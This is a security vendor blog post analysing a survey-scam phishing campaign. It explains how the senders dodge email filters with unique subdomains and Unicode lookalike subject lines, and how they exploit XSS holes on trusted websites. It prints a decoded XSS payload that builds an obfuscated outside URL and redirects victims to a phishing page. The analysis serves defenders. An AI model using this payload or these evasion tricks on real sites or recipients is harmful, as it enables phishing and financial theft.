Below is an example of a sophisticated survey scam phishing email that KnowBe4’s Threat Lab team has been monitoring as discussed in “The Hidden Cost of "Free" Gifts: How Survey Scams Are Evolving to Steal Financial Data”.

As discussed in our previous blog, the human element is a critical part of the fake survey scam. However, the campaign's success is largely due to its advanced technical infrastructure. KnowBe4 Threat Lab research has uncovered a sophisticated operation designed to bypass standard security tools like Secure Email Gateways (SEGs) and other legacy filters. Although it may appear as a low-effort phishing campaign; it's a multi-layered attack built for stealth and scale.

Screenshot of a survey scam phishing email impersonating AAA, viewed in the PhishER portal

Dynamic Sender and Subject Evasion 

The first challenge cybercriminals have to overcome with these traditional email security tools is their ability to identify and block bulk malicious emails that contain previously identified payloads, are sent from known malicious domains or have similarities to other phishing emails, such as subject line. Therefore, attackers have made each email appear unique. 

• Unique subdomains: Each recipient receives an email from a unique subdomain. This prevents security tools from grouping and blocking emails based on a single sender domain.
• Unicode characters: The subject lines are dynamic and use subtle Unicode variations of English letters, which look identical to the naked eye. A subject line like "Your Free Gift" might use a different "o" or "e" character in each email, making it nearly impossible for filters to detect and block based on simple text matching.

Exploiting Vulnerable Websites

The attackers also employ a clever method to bypass domain reputation checks, a common security measure. Instead of hosting their malicious links on a new, suspicious domain, they find and exploit Cross-Site Scripting (XSS) vulnerabilities on legitimate, trusted websites. The initial link in the phishing email directs users to one of these vulnerable sites.

The XSS Payload and Redirection 

Once a user clicks the link and lands on the compromised website to undertake the survey, the attack is executed automatically without any further user interaction. The attackers use an XSS exploit based on the HTML <img> element. The link contains a URL-encoded JavaScript payload within the onerror event handler.

Here's a simplified look at the decoded payload:

"><img src="image.jpg" onerror="var url1 = ['http://g','o','o','g','le.com','/','#','f'].join(''); var url2 = ['http://g','o','og','le.c','om','/','#','f'].join('');var url = ['h','ttp','s://ww','w.gr','ech','as.c','om/25','PBN','Z99/7GX','8','N83','N/'].join('');var furl = url + '?' + 'sub1=9&sub2=867-89800&sub3=1265-12423-36636'; furl = furl.replace(/,/g, ''); var win = window.open(furl, '_self'); win.opener = null; win.location.replace(furl);">

This JavaScript code dynamically constructs a new URL and immediately redirects the user to the final phishing page. The attackers use unique IDs and rotate between multiple final destination URLs to avoid being flagged. This technique allows them to leverage the trusted reputation of the vulnerable website to slip past security filters and deliver their payload to the user's browser.

A Continual Threat 

The threat actors behind this campaign are constantly adapting. They rotate their themes seasonally and impersonate a variety of trusted brands to increase their chances of success, with other examples including phishing emails that impersonate Costco and United Healthcare.  Their use of dynamic email content and sophisticated technical evasion techniques shows a level of expertise far beyond the average scammer. It is clear organizations need to prioritize a dual approach to security to defend against more sophisticated attacks, accounting for more intelligent technical defenses such as KnowBe4 Defend and relevant, personal and adaptive coaching that focuses on human behavior over tick-box compliance. 

For more on the basics behind this campaign, read our companion blog, "The Hidden Cost of 'Free' Gifts."